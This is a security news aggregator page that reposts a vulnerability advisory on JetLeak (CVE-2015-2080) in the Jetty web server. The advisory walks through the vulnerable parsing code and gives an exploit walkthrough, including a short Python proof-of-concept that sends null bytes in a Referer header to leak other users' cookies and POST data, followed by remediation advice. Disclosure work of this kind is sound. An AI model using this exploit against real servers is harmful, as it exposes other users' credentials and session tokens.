Contribuez à SecuObs en envoyant des bitcoins ou des dogecoins.
Nouveaux articles (fr): 1pwnthhW21zdnQ5WucjmnF3pk9puT5fDF
Amélioration du site: 1hckU85orcGCm8A9hk67391LCy4ECGJca

Contribute to SecuObs by sending bitcoins or dogecoins.

Chercher :
Newsletter :  


Revues :
- Presse
- Presse FR
- Vidéos
- Twitter
- Secuobs





Sommaires :
- Tendances
- Failles
- Virus
- Concours
- Reportages
- Acteurs
- Outils
- Breves
- Infrastructures
- Livres
- Tutoriels
- Interviews
- Podcasts
- Communiques
- USBsploit
- Commentaires


Revue Presse:
- Tous
- Francophone
- Par mot clé
- Par site
- Le tagwall


Top bi-hebdo:
- Ensemble
- Articles
- Revue
- Videos
- Twitter
- Auteurs


Articles :
- Par mot clé
- Par auteur
- Par organisme
- Le tagwall


Videos :
- Toutes
- Par mot clé
- Par site
- Le tagwall


Twitter :
- Tous
- Par mot clé
- Par compte
- Le tagwall


Commentaires :
- Breves
- Virus
- Failles
- Outils
- Tutoriels
- Tendances
- Acteurs
- Reportages
- Infrastructures
- Interviews
- Concours
- Livres
- Communiques


RSS/XML :
- Articles
- Commentaires
- Revue
- Revue FR
- Videos
- Twitter


RSS SecuObs :
- sécurité
- exploit
- windows
- attaque
- outil
- microsoft


RSS Revue :
- security
- microsoft
- windows
- hacker
- attack
- network


RSS Videos :
- curit
- security
- biomet
- metasploit
- biometric
- cking


RSS Twitter :
- security
- linux
- botnet
- attack
- metasploit
- cisco


RSS Comments :
- Breves
- Virus
- Failles
- Outils
- Tutoriels
- Tendances
- Acteurs
- Reportages
- Infrastructures
- Interviews
- Concours
- Livres
- Communiques


RSS OPML :
- Français
- International











Revue de presse francophone :
- Appaloosa AppDome nouent un partenariat pour accompagner les entreprises dans le déploiement et la protection des applications mobiles
- D-Link offre une avec un routeur VPN sans fil AC
- 19 mai Paris Petit-Déjeuner Coreye Développer son business à l'abri des cyberattaques
- POYNTING PRESENTE LA NOUVELLE ANTENNE OMNI-291, SPECIALE MILIEU MARITIME, CÔTIER ET MILIEU HUMIDE
- Flexera Software Les utilisateurs français de PC progressent dans l'application de correctifs logiciels, mais des défis de tailles subsistent
- Riverbed lance SD-WAN basé sur le cloud
- Fujitsu multi-récompensé VMware lui décerne plusieurs Partner Innovation Awards à l'occasion du Partner Leadership Summit
- Zscaler Private Access sécuriser l'accès à distance en supprimant les risques inhérents aux réseaux privés virtuels
- QNAP annonce la sortie de QTS 4.2.1
- Une enquête réalisée par la société de cyber sécurité F-Secure a décelé des milliers de vulnérabilités graves, potentiellement utilisables par des cyber criminels pour infiltrer l'infrastru
- Trouver le juste équilibre entre une infrastructure dédiée et cloud le dilemme de la distribution numérique
- 3 juin - Fleurance - Cybersécurité Territoires
- Cyber-assurances Seules 40 pourcents des entreprises françaises sont couvertes contre les violations de sécurité et les pertes de données
- Des étudiants de l'ESIEA inventent CheckMyHTTPS un logiciel qui vérifie que vos connexions WEB sécurisées ne sont pas interceptées
- Les produits OmniSwitch d'Alcatel-Lucent Enterprise ALE gagnent en sécurité pour lutter contre les cyber-attaques modernes

Dernier articles de SecuObs :
- DIP, solution de partage d'informations automatisée
- Sqreen, protection applicative intelligente de nouvelle génération
- Renaud Bidou (Deny All): "L'innovation dans le domaine des WAFs s'oriente vers plus de bon sens et d'intelligence, plus de flexibilité et plus d'ergonomie"
- Mises à jour en perspective pour le système Vigik
- Les russes ont-ils pwn le système AEGIS ?
- Le ministère de l'intérieur censure une conférence au Canada
- Saut d'air gap, audit de firmware et (in)sécurité mobile au programme de Cansecwest 2014
- GCHQ: Le JTRIG torpille Anonymous qui torpille le JTRIG (ou pas)
- #FIC2014: Entrée en territoire inconnu
- Le Sénat investit dans les monnaies virtuelles

Revue de presse internationale :
- VEHICLE CYBERSECURITY DOT and Industry Have Efforts Under Way, but DOT Needs to Define Its Role in Responding to a Real-world Attack
- Demand letter served on poll body over disastrous Comeleak breach
- The Minimin Aims To Be The Simplest Theremin
- Hacking group PLATINUM used Windows own patching system against it
- Hacker With Victims in 100 Nations Gets 7 Years in Prison
- HPR2018 How to make Komboucha Tea
- Circuit Bender Artist bends Fresnel Lens for Art
- FBI Director Suggests iPhone Hacking Method May Remain Secret
- 2016 Hack Miami Conference May 13-15, 2016
- 8-bit Video Wall Made From 160 Gaming Keyboards
- In An Era Of Decline, News Sites Can t Afford Poor Web Performance
- BeautifulPeople.com experiences data breach 1m affected
- Swedish Air Space Infringed, Aircraft Not Required
- Why cybercriminals attack healthcare more than any other industry
- Setting the Benchmark in the Network Security Forensics Industry

Annuaire des videos
- FUZZING ON LINE PART THREE
- Official Maltego tutorial 5 Writing your own transforms
- Official Maltego tutorial 6 Integrating with SQL DBs
- Official Maltego tutorial 3 Importing CSVs spreadsheets
- install zeus botnet
- Eloy Magalhaes
- Official Maltego tutorial 1 Google s websites
- Official Maltego tutorial 4 Social Networks
- Blind String SQL Injection
- backdoor linux root from r57 php shell VPS khg crew redc00de
- How To Attaque Pc With Back Track 5 In Arabique
- RSA Todd Schomburg talks about Roundup Ready lines available in 2013
- Nessus Diagnostics Troubleshooting
- Panda Security Vidcast Panda GateDefender Performa Parte 2 de 2
- MultiPyInjector Shellcode Injection

Revue Twitter
- RT @fpalumbo: Cisco consistently leading the way ? buys vCider to boost its distributed cloud vision #CiscoONE
- @mckeay Looks odd... not much to go on (prob some slideshow/vid app under Linux)
- [SuggestedReading] Using the HTML5 Fullscreen API for Phishing Attacks
- RT @BrianHonan: Our problems are not technical but cultural. OWASP top 10 has not changed over the years @joshcorman #RSAC
- RT @mikko: Wow. Apple kernels actually have a function called PE_i_can_has_debugger:
- [Blog Spam] Metasploit and PowerShell payloads
- PinkiePie Strikes Again, Compromises Google Chrome in Pwnium Contest at Hack in the Box: For the second time thi...
- @mikko @fslabs y'all wldn't happen to have lat/long data sets for other botnets, wld you? Doing some research (free/open info rls when done)
- RT @nickhacks: Want to crash a remote host running Snow Leopard? Just use: nmap -P0 -6 --script=targets-ipv6-multicast-mld #wishiwaskidding
- An inexpensive proxy service called is actually a front for #malware distribution -

Mini-Tagwall
Revue de presse : security, microsoft, windows, hacker, attack, network, vulnerability, google, exploit, malware, internet, remote, iphone

+ de mots clés pour la revue de presse

Annuaires des videos : curit, security, biomet, metasploit, biometric, cking, password, windows, botnet, defcon, tutorial, crypt, xploit

+ de mots clés pour les videos

Revue Twitter : security, linux, botnet, attack, metasploit, cisco, defcon, phish, exploit, google, inject, server, firewall

+ de mots clés pour la revue Twitter

Top bi-hebdo des articles de SecuObs
- [Ettercap – Partie 2] Ettercap par l'exemple - Man In the Middle et SSL sniffing
- [Infratech - release] version 0.6 de Bluetooth Stack Smasher
- [IDS Snort Windows – Partie 2] Installation et configuration
- [Infratech - vulnérabilité] Nouvelle version 0.8 de Bluetooth Stack Smasher
- Mises à jour en perspective pour le système Vigik
- USBDumper 2 nouvelle version nouvelles fonctions !
- EFIPW récupère automatiquement le mot de passe BIOS EFI des Macbook Pro avec processeurs Intel
- La sécurité des clés USB mise à mal par USBDUMPER
- Une faille critique de Firefox expose les utilisateurs de Tor Browser Bundle
- Installation sécurisée d'Apache Openssl, Php4, Mysql, Mod_ssl, Mod_rewrite, Mod_perl , Mod_security

Top bi-hebdo de la revue de presse
- StackScrambler and the Tale of a Packet Parsing Bug

Top bi-hebdo de l'annuaire des videos
- DC++ Botnet. How To DDos A Hub With Fake IPs.
- Comment creer un server botnet!!!!(Réseau de pc zombies)
- Defcon 14 Hard Drive Recovery Part 3

Top bi-hebdo de la revue Twitter
- RT @secureideas: I believe that all the XSS flaws announced are fixed in CVS. Will test again tomorrow if so, release 1.4.3. #BASESnort
- Currently, we do not support 100% of the advanced PDF features found in Adobe Reader... At least that's a good idea.
- VPN (google): German Foreign Office Selects Orange Business for Terrestrial Wide: Full
- @DisK0nn3cT Not really, mostly permission issues/info leak...they've had a couple of XSS vulns but nothing direct.
- Swatting phreaker swatted and heading to jail: A 19-year-old American has been sentenced to eleven years in pris..
- RT @fjserna You are not a true hacker if the calc.exe payload is not the scientific one... infosuck.org/0x0035.png

Top des articles les plus commentés
- [Metasploit 2.x – Partie 1] Introduction et présentation
- Microsoft !Exploitable un nouvel outil gratuit pour aider les développeurs à évaluer automatiquement les risques
- Webshag, un outil d'audit de serveur web
- Les navigateurs internet, des mini-systèmes d’exploitation hors de contrôle ?
- Yellowsn0w un utilitaire de déblocage SIM pour le firmware 2.2 des Iphone 3G
- CAINE un Live[CD|USB] pour faciliter la recherche légale de preuves numériques de compromission
- Nessus 4.0 placé sous le signe de la performance, de l'unification et de la personnalisation
- [Renforcement des fonctions de sécurité du noyau Linux – Partie 1] Présentation
- [IDS Snort Windows – Partie 1] Introduction aux IDS et à SNORT
- Origami pour forger, analyser et manipuler des fichiers PDF malicieux

JetLeak Vulnerability Remote Leakage of Shared Buffers in Jetty Web Server CVE-2015-2080

Si vous voulez bloquer ce service sur vos fils RSS
Si vous voulez nous contacter ou nous proposer un fil RSS

Menu > Articles de la revue de presse : - l'ensemble [tous | francophone] - par mots clé [tous] - par site [tous] - le tagwall [voir] - Top bi-hebdo de la revue de presse [Voir]

S'abonner au fil RSS global de la revue de presse



JetLeak Vulnerability Remote Leakage of Shared Buffers in Jetty Web Server CVE-2015-2080

Par Blog
Le [2015-02-25] à 08:08:27



Présentation : Overview -------- GDS discovered a critical information leakage vulnerability in the Jetty web server that allows an unauthenticated remote attacker to read arbitrary data from previous requests submitted to the server by other users. I know that sentence is a mouthful, so take a brief moment to digest it, or simply keep reading to understand what that means. Simply put, if you re running a vulnerable version of the Jetty web server, this can lead to the compromise of sensitive data, including data passed within headers e.g. cookies, authentication tokens, Anti-CSRF tokens, etc. , as well as data passed in the POST body e.g. usernames, passwords, authentication tokens, CSRF tokens, PII, etc. . GDS also observed this data leakage vulnerability with responses as well, but for brevity this blog post will concentrate on requests The root cause of this vulnerability can be traced to exception handling code that returns approximately 16 bytes of data from a shared buffer when illegal characters are submitted in header values to the server. An attacker can exploit this behavior by submitting carefully crafted requests containing variable length strings of illegal characters to trigger the exception and offset into the shared buffer. Since the shared buffer contains user submitted data from previous requests, the Jetty server will return specific data chunks approximately 16-bytes in length from the user s request depending on the attacker s payload offset. Am I vulnerable ---------------- This vulnerability affects versions 9.2.3 to 9.2.8. GDS also found that beta releases and later including the beta releases of 9.3.x are vulnerable. We have created a simple python script that can be used to determine if a Jetty HTTP server is vulnerable. The script code can be downloaded from the GDS Github repository below https github.com GDSSecurity Jetleak-Testing-Script Walkthrough of Vulnerable Code ------------------------------ When the Jetty web server receives a HTTP request, the below code is used to parse through the HTTP headers and their associated values. This walkthrough will focus primarily on the parsing of the header values. The server begins by looping through each character for a given header value and checks the following On Line 1164, the server checks if the character is printable ASCII or not a valid ASCII character On Line 1172, the server checks if the character is a space or tab On Line 1175, the server checks if the character is a line feed If the character is non-printable ASCII or less than 0x20 , then all of the checks above are skipped over and the code throws an IllegalCharacter exception on line 1186, passing in the illegal character and a shared buffer. File jetty-http src main java org eclipse jetty http HttpParser.java 920 protected boolean parseHeaders ByteBuffer buffer 921 . . snip . . 1163 case HEADER_VALUE 1164 if ch HttpTokens . SPACE ch 0 1178 1179 _value null 1180 _valueString _valueString null takeString _valueString takeString 1181 1182 setState State . HEADER 1183 break 1184 1185 1186 throw new IllegalCharacter ch , buffer In the definition of the IllegalCharacter method, the server returns an error message. The error message is a format string composed of the illegal character, a static string that represents whether the exception occurred in the header name or header value, and finally a String that outputs some content of the shared buffer via a call to BufferUtil.toDebugString . File jetty-http src main java org eclipse jetty http HttpParser.java 1714 private class IllegalCharacter extends BadMessage 1715 1716 IllegalCharacter byte ch , ByteBuffer buffer 1717 1718 super String . format Illegal character 0x pourcents x in state pourcents s in ' pourcents s , ch , _state , BufferUtil . toDebugString buffer 1719 1720 In the toDebugString method, there is a call to appendDebugString , which accepts a StringBuilder object as its first parameter and the shared buffer object as the second parameter. The StringBuilder object will be populated by the appendDebugString method and ultimately returned to the user. File jetty-util src main java org eclipse jetty util BufferUtil.java 963 public static String toDebugString ByteBuffer buffer 964 965 if buffer null 966 return null 967 StringBuilder buf new StringBuilder 968 appendDebugString buf , buffer 969 return buf . toString 970 Since the shared buffer contains data from previous requests, in order for the attacker to retrieve specific data in the shared buffer, their goal is to create a long enough string of illegal characters to overwrite non-important data in the previous request up until the data the attacker wants e.g. Cookies, authentication tokens, etc. . When the code on line 996 executes, the server reads 16 bytes from the shared buffer before appending . Since the attacker already off-setted into the previous request via an appropriate length string of illegal characters, these 16 bytes should contain sensitive user data from a previous user s request. File jetty-util src main java org eclipse jetty util BufferUtil.java 972 private static void appendDebugString StringBuilder buf,ByteBuffer buffer 973 . . snip . . 983 buf . append buffer . position 32 988 989 buf . append 990 i buffer . limit - 16 991 992 993 buf . append 994 int limit buffer . limit 995 buffer . limit buffer . capacity 996 for int i limit i limit 32 1000 1001 buf . append 1002 i buffer . capacity - 16 1003 1004 1005 buffer . limit limit 1006 Additional places where IllegalCharacter is called in 9.2.x codebase line numbers may differ jetty.project-jetty-9.2.x jetty-http src main java org eclipse jetty http HttpParser.java 401 jetty.project-jetty-9.2.x jetty-http src main java org eclipse jetty http HttpParser.java 530 jetty.project-jetty-9.2.x jetty-http src main java org eclipse jetty http HttpParser.java 547 jetty.project-jetty-9.2.x jetty-http src main java org eclipse jetty http HttpParser.java 1161 jetty.project-jetty-9.2.x jetty-http src main java org eclipse jetty http HttpParser.java 1215 The section below provides a walkthrough of how a malicious user could exploit this vulnerability to read sensitive data from another user s HTTP requests e.g. cookies, authentication headers, credentials or sensitive data submitted within URLs or POST data . Exploit Walkthrough ------------------- Step 1 The HTTP request below represents a sample request sent by a victim to the Jetty web server version 9.2.7.v20150116 . Notice the Cookie and POST body parameters sent to the server since these will be the values that will be targeted within our proof of concept. Reproduction Request VICTIM POST test-spec test HTTP 1.1 Host 192.168.56.101 8080 User-Agent Mozilla 5.0 Windows NT 6.4 WOW64 rv 35.0 Gecko 20100101 Cookie password secret Accept text html,application xhtml xml,application xml q 0.9, q 0.8 Accept-Language en-US,en q 0.5 Accept-Encoding gzip, deflate Referer http 192.168.56.101 8080 test-spec Connection keep-alive Content-Type application x-www-form-urlencoded Content-Length 13 param1 test Reproduction Response VICTIM HTTP 1.1 200 OK Set-Cookie visited yes Expires Thu, 01 Jan 1970 00 00 00 GMT Content-Type text html Server Jetty 9.2.7.v20150116 Content-Length 3460 Step 2 As the attacker, craft a request to the same endpoint, but remove the contents of the Referer header and replace it with a string of illegal characters. In this particular case, the string contains 44 null bytes. One could conceivably use any non-ASCII character less than 0x20 other than line-feed since the code handles it specially . Note, the process of figuring out the correct length of characters for the illegal character string is an iterative process. The suggestion is to start with a small string and work towards a larger size string. If the attacker starts with too large of a string they risk overwriting sensitive data from the previous request. Ideally, the attacker wants to overwrite data in the previous request up until the beginning of the sensitive data. The code will then read 16 bytes of sensitive data and return it to the attacker. import httplib , urllib conn httplib . HTTPConnection 127.0.0.1 8080 headers Referer chr 0 44 conn . request POST , test-spec test , , headers r1 conn . getresponse print r1 . status , r1 . reason Step 3 Once the script is run and the malicious payload is sent to the server, the attacker should receive a response similar to the one below. Notice that the cookie value is contained within the response. Since it is conceivable that the attacker may want to obtain a value greater than 16 bytes in length, the script above can be run multiple times to get additional 16 byte chunks from the buffer. Step 4 To read the POST body parameters, the attacker can modify the length of the illegal character string to offset further into the shared buffer as shown below. Remediation ----------- Currently, if you are running one of the vulnerable Jetty web server versions, Jetty recommends that you upgrade to version 9.2.9.v20150224 immediately. Organizations should also be aware that Jetty may be bundled within third party products. We recommend referring to the Jetty Powered website for a list of products not exhaustive that utilize Jetty. Due to Jetty being a fairly lightweight HTTP server, it is also commonly used by a variety of embedded systems. Organizations should contact any vendors that may be running a Jetty web server in order to determine if their products are vulnerable and when any patches to resolve this vulnerability will be made available. Disclosure Timeline ------------------- Feb 19, 2015 - Vulnerability report sent to security eclipse.org using SendSafely Feb 23, 2015 - Jetty team downloads the vulnerability report Feb 24, 2015 - Jetty team releases HTTP Server v9.2.9.v20150224 with bug fix and publicly discloses vulnerability with exploit code Feb 25, 2015 - GDS publicly discloses vulnerability GDS commends the Jetty development team on their timely response and swift remediation. It should be noted that the decision to publicly disclose the vulnerability was made by the Jetty development team, independent of GDS. GDS blog post was published after it was discovered that Jetty had publicly disclosed the vulnerability.

Les mots clés de la revue de presse pour cet article : vulnerability remote server
Les videos sur SecuObs pour les mots clés : vulnerability remote server
Les mots clés pour les articles publiés sur SecuObs : remote
Les éléments de la revue Twitter pour les mots clé : vulnerability remote server



AddThis Social Bookmark Widget



Les derniers articles du site "Blog" :

- Malware Trends - Q1 2016
- Simplified DDoS Testing at Scale
- BreakingPoint Captures Real-World 2015 Application Trends
- ATI Minecraft
- Benchmarking Open Source SDN Controllers Are They Ready for Carrier-Grade Services
- The End of Days is Here for Network Blind Spots
- Ixia ATI Research Center Finds Multiple Security Vulnerabilities in IBM Tivoli Storage Manager FastBack
- Introducing PSAttack
- Mobile World Congress 2016 Recap
- Ixia Smarter Security at RSA 2016




S'abonner au fil RSS global de la revue de presse

Menu > Articles de la revue de presse : - l'ensemble [tous | francophone] - par mots clé [tous] - par site [tous] - le tagwall [voir] - Top bi-hebdo de la revue de presse [Voir]



Si vous voulez bloquer ce service sur vos fils RSS :
- avec iptables "iptables -A INPUT -s 88.190.17.190 --dport 80 -j DROP"
- avec ipfw et wipfw "ipfw add deny from 88.190.17.190 to any 80"
- Nous contacter par mail




SecuToolBox :

Mini-Tagwall des articles publiés sur SecuObs :

Mini-Tagwall de l'annuaire video :

Mini-Tagwall des articles de la revue de presse :

Mini-Tagwall des Tweets de la revue Twitter :